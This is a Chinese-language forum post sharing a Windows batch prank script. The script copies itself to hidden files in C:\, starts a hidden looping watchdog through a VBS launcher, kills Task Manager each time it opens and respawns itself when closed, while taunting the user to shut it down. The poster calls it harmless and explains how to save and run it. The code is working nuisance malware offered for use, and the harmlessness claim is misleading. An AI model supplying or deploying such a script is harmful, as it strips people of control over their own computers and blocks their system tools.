- 元宝
- 锭
- 注册时间
- 2008-2-21
- 最后登录
- 1970-1-1
|
[Copy to clipboard] [ - ]CODE:
@echo off
if not exist c:\wind.bat (
copy %0 c:\wind.bat>nul
attrib c:\wind.bat +h
echo ^@echo off>c:\check.bat
echo :ck>>c:\check.bat
echo tasklist ^| find /i "taskmgr.exe" ^&^& taskkill /f /im taskmgr.exe>>c:\check.bat
echo if not exist c:\wind.bat taskkill /f /im cmd.exe>>c:\check.bat
echo for /f "tokens=*" %%%%a in ^('tasklist ^^^| find /i /c "cmd.exe"'^) do ^(set n=%%%%a^)>>c:\check.bat
echo if %%n%% lss 3 start c:\wind.bat>>c:\check.bat
echo goto ck>>c:\check.bat
attrib c:\check.bat +h
echo set wind=createobject^("wscript.shell"^)>c:\ycyx.vbs
echo wind.run "c:\check.bat",vbhide>>c:\ycyx.vbs
attrib c:\ycyx.vbs +h
start c:\ycyx.vbs
)
color 0a
echo.
echo.
echo.
echo.
echo 你来关掉我丫....快点丫......
pause>nul
对机器跟硬件无任何损害
纯粹蛋疼的
把他放到txt文件夹里然后把后缀改为cmd |
|